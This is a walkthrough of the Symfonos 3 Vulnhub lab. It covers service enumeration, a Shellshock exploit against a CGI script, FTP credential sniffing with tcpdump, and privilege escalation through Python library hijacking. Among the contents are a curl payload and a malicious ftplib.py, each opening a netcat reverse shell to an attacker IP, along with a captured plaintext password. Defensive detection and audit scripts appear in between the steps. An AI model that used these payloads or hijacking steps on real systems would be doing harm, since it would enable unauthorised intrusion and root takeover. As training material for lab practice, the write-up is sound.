Symfonos 3

Symfonos 3 Vulnhub Walkthrough

Enumeration

Nmap

nmap -sC -sV -oA nmap/sym3 192.168.1.114
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 02:39 EDT
Nmap scan report for 192.168.1.114
Host is up (0.00016s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5b
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 cd:64:72:76:80:51:7b:a8:c7:fd:b2:66:fa:b6:98:0c (RSA)
|   256 74:e5:9a:5a:4c:16:90:ca:d8:f7:c7:78:e7:5a:86:81 (ECDSA)
|_  256 3c:e4:0b:b9:db:bf:01:8a:b7:9c:42:bc:cb:1e:41:6b (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:DA:E2:26 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds

Let's open the IP in the browser.

Inspecting the page source (inspect element) shows this:

So, I decided to use dirb and gobuster

dirb & gobuster

dirb http://192.168.1.114/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue May 26 02:42:28 2020
URL_BASE: http://192.168.1.114/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.114/ ----
+ http://192.168.1.114/cgi-bin/ (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.1.114/gate/
+ http://192.168.1.114/index.html (CODE:200|SIZE:241)
+ http://192.168.1.114/server-status (CODE:403|SIZE:278)

---- Entering directory: http://192.168.1.114/gate/ ----
+ http://192.168.1.114/gate/index.html (CODE:200|SIZE:202)

-----------------
END_TIME: Tue May 26 02:42:38 2020
DOWNLOADED: 9224 - FOUND: 4

We found a directory called /gate.

Nothing in it seems interesting, so let's continue enumerating.

dirb didn't turn up anything else, so I switched to gobuster.

gobuster dir -u http://192.168.1.114/gate/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.114/gate/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/26 02:44:57 Starting gobuster
===============================================================
/cerberus (Status: 301)
===============================================================
2020/05/26 02:45:39 Finished
===============================================================

We found a directory called /cerberus.

Further enumeration turned up /tartarus, which shows this:

Inspecting the page source, there is a comment saying it may be misleading.

It seems we've gone down a rabbit hole, so let's go back to square one.

I used dirbuster to enumerate the URL again.

This time the enumeration found an underworld directory under /cgi-bin.

Let's navigate to /cgi-bin/underworld.

Got this... hmmm.

After some research (PentesterLab covers it), I found out that this is the Shellshock vulnerability: a CGI script served by Apache is run through bash, and bash evaluates function definitions passed in environment variables such as the User-Agent header.

Exploitation

Reverse Shell

We can get a reverse shell by using this command

curl -A "() { :; }; /bin/bash -c 'nc 192.168.1.117 443 -e /bin/sh'" http://192.168.1.118/cgi-bin/underworld

And we need to set up a listener on our machine:

nc -nlvp 443

We get a reverse shell. Then we can use this Python one-liner to spawn a proper TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

After that I used tcpdump to capture the FTP server's traffic on the loopback interface and saved it in the /tmp directory.
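For the defending side, the request above leaves a clear trace in Apache's access log, because the combined log format records the User-Agent and Referer headers that carry the payload. The following detector is an added example, not part of this writeup; the log lines are constructed, and the field layout assumes Apache's default combined format.

```python
import re

# Apache "combined" log format (the Debian default): the Referer and User-Agent
# headers are logged, which is exactly where a Shellshock payload travels.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A Shellshock payload is a bash exported-function definition "() { ... };"
# followed by trailing commands; whitespace between the tokens is optional.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')

def is_shellshock(value):
    """True if a header or request value carries a bash function-import payload."""
    return bool(SHELLSHOCK_RE.search(value))

def scan_access_log(lines):
    """Return one finding per suspicious line: source IP, requested path,
    which logged fields carried the payload, and whether a CGI script was hit."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue  # not combined format; skip rather than guess
        hit = [f for f in ("agent", "referer", "request") if is_shellshock(m.group(f))]
        if not hit:
            continue
        parts = m.group("request").split(" ")
        path = parts[1] if len(parts) > 1 else ""
        findings.append({
            "line": lineno,
            "src": m.group("host"),
            "path": path,
            "fields": hit,
            "cgi": path.startswith("/cgi-bin/"),  # CGI is what makes the payload executable
        })
    return findings

# Constructed sample log lines (not captured from the writeup's target).
SAMPLE_LOG = [
    "192.168.1.117 - - [26/May/2020:02:50:01 -0400] \"GET /cgi-bin/underworld HTTP/1.1\" 200 45 \"-\" \"() { :; }; /bin/bash -c 'id'\"",
    "192.168.1.50 - - [26/May/2020:02:51:12 -0400] \"GET /gate/index.html HTTP/1.1\" 200 202 \"-\" \"Mozilla/5.0 (X11; Linux x86_64) Firefox/76.0\"",
    "192.168.1.117 - - [26/May/2020:02:52:40 -0400] \"GET /cgi-bin/underworld HTTP/1.1\" 200 45 \"() { ignored; }; /bin/bash -c 'id'\" \"curl/7.68.0\"",
    "192.168.1.117 - - [26/May/2020:02:53:03 -0400] \"GET /cgi-bin/ HTTP/1.1\" 403 278 \"-\" \"gobuster/3.0.1\"",
]
```

Running scan_access_log(SAMPLE_LOG) flags lines 1 and 3 only; the directory brute-force on line 4 is noisy but carries no payload.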

tcpdump -w ftplog.pcap -i lo

Then we can use nc to transfer the file to our machine for analysis.

After that, open it in Wireshark.

Filter on tcp.port == 21, right-click a packet and choose Follow TCP Stream, and we can see this:

FTP sends the login in cleartext, so we got the username (hades) and the password (PTpZTfU4vxgzvRBE) straight from the stream.

We can su to the user hades.

Privilege Escalation

After that we run pspy again to watch what processes are being spawned.

Then we got this:

From the pspy output we can see a script under /opt/ftpclient being run as root.

But when we go to /opt/ftpclient we find that we have no permission to edit the files there.

Python Library Hijacking

After researching and asking the machine's author (because I didn't know how it worked), it turns out this is Python library hijacking.

python -c 'import sys; print "\n".join(sys.path)'

This command prints the directories Python searches, in order, when importing a library. The first directory that contains a matching module wins.

As we can see, there are a bunch of directories.

If we cat ftpclient.py under /opt/ftpclient, we can see that it imports a library called ftplib.

We navigate to /usr/lib/python2.7

Then we can type ls -la | grep ftplib.

We can see that ftplib.py is writable by the group gods, and hades is a member of that group, so hades can edit a library that a root process imports.

We first rename the original file as a backup.

Then we use nano to create a new ftplib.py in place of the old one.

Type in this code to get a reverse shell:
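To find this kind of misconfiguration before someone else does, the following audit is an added example (not from the writeup or the machine). It walks the interpreter's import search path in order and reports any directory or candidate module file for the given name that is not root-owned, is writable by a group other than root's, or is world-writable. The trusted-group set is an assumption; a file group-writable by gods would be reported by that group's numeric gid.

```python
import os
import stat
import sys

# Groups allowed to write to library directories. Only root's group by default;
# a library group-writable by "gods" (as on this box) shows up by its numeric gid.
TRUSTED_GIDS = {0}

def writability_issues(mode, uid, gid, trusted_gids=TRUSTED_GIDS):
    """Reasons a file or directory with these stat values could be modified by
    someone other than root (assumed baseline: root-owned, no group/other write)."""
    issues = []
    if uid != 0:
        issues.append("owned by uid %d, not root" % uid)
    if mode & stat.S_IWGRP and gid not in trusted_gids:
        issues.append("group-writable by gid %d" % gid)
    if mode & stat.S_IWOTH:
        issues.append("world-writable")
    return issues

def audit_import_path(module, search_path=None, trusted_gids=TRUSTED_GIDS):
    """Walk the import search path in order and report every directory, module
    file or package directory for `module` that a non-root user could change.
    Order matters: the first entry that resolves is what `import module` loads,
    so a writable entry earlier in the list shadows the real library."""
    findings = []
    for entry in (sys.path if search_path is None else search_path):
        base = entry or os.getcwd()  # '' in sys.path means the current directory
        candidates = [base, os.path.join(base, module),
                      os.path.join(base, module + ".py"),
                      os.path.join(base, module + ".pyc")]
        for path in candidates:
            try:
                st = os.stat(path)
            except OSError:
                continue  # nothing at this location; the import would not load from here
            issues = writability_issues(st.st_mode, st.st_uid, st.st_gid, trusted_gids)
            if issues:
                findings.append((path, issues))
    return findings

if __name__ == "__main__":
    name = sys.argv[1] if len(sys.argv) > 1 else "ftplib"
    for path, issues in audit_import_path(name):
        print("%s: %s" % (path, "; ".join(issues)))
```

Run it under the interpreter whose libraries you want to check (here the python2.7 that ftpclient.py is run with), because sys.path differs between Python 2.7 and 3.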

import os
import sys
os.system("nc -e /bin/bash 192.168.1.116 4444")

Then save the file.

Go to our machine and set up a listener:

nc -nlvp 4444

After waiting about a minute, the root-run ftpclient script imports our ftplib.py and we get a reverse shell back.

Then use the same Python one-liner to get a proper shell.

Then we've got root!

Navigate to /root to get flag.txt.

Congratulations!
